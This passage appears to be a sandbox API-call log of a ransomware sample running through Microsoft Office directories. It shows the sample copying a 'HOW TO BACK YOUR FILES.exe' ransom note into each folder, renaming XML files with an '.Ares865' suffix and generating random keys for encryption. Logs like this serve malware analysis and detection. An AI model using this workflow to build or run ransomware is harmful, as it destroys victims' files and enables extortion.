Office\\Office14\\Library") returned="C:\\Program Files\\Microsoft Office\\Office14\\Library" [0070.734] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.734] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\library\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.745] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.745] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5bacaee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bacaee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0070.745] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.745] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.745] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER") returned="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER" [0070.745] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0070.745] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0070.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER") returned 57 [0070.745] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER") returned="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER" [0070.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\library\\solver\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.749] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.749] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\SOLVER\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5bacaee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bacaee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0070.750] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.750] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.750] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis") returned="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis" [0070.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0070.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0070.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis") returned 59 [0070.750] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis") returned="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis" [0070.750] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.750] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\library\\analysis\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.771] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.771] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Library\\Analysis\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1887d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5baf1040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5baf1040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0070.771] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.771] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.772] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM" [0070.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0070.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0070.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM") returned 53 [0070.772] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM" [0070.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.805] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.805] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bb3d300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bb3d300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0070.805] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.806] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.806] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.Ares865") returned 91 [0070.806] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\microsoft.office.infopath.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\microsoft.office.infopath.xml.ares865"), dwFlags=0x1) returned 1 [0070.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\microsoft.office.infopath.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.809] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=253407) returned 1 [0070.809] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0070.809] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.809] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0070.855] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0070.855] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.856] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0070.859] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12" [0070.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0070.859] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0070.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12") returned 67 [0070.859] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12" [0070.859] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.859] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.869] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.869] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bbfb9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bbfb9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0070.869] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.869] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.870] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.Ares865") returned 105 [0070.870] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\microsoft.office.infopath.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\microsoft.office.infopath.xml.ares865"), dwFlags=0x1) returned 1 [0070.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\microsoft.office.infopath.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0070.873] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=253407) returned 1 [0070.873] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0070.874] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.874] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0070.936] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0070.937] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.937] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0070.941] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices" [0070.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0070.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0070.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices") returned 76 [0070.941] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices" [0070.941] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.941] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.946] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.946] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x545acaf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5bcba0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5bcba0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0070.947] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.947] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.Ares865") returned 114 [0070.947] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\microsoft.office.infopath.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\microsoft.office.infopath.xml.ares865"), dwFlags=0x1) returned 1 [0070.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\microsoft.office.infopath.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.949] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=253407) returned 1 [0070.949] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0070.950] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.950] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0071.074] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0071.075] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.075] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0071.117] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12" [0071.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0071.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0071.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12") returned 102 [0071.117] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12") returned="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12" [0071.117] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.117] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.123] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.123] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x553a8c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5be5cfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5be5cfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.123] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.123] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.123] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.Ares865") returned 140 [0071.123] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\microsoft.office.infopath.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\microsoft.office.infopath.xml.ares865"), dwFlags=0x1) returned 1 [0071.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\microsoft.office.infopath.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0071.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=253407) returned 1 [0071.133] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0071.133] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0071.133] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0071.158] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0071.158] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0071.158] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0071.162] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove" [0071.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e47f0 | out: hHeap=0x2b0000) returned 1 [0071.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0071.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove") returned 49 [0071.162] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove" [0071.162] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.162] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.170] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5becf400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5becf400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.170] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.170] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files" [0071.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: 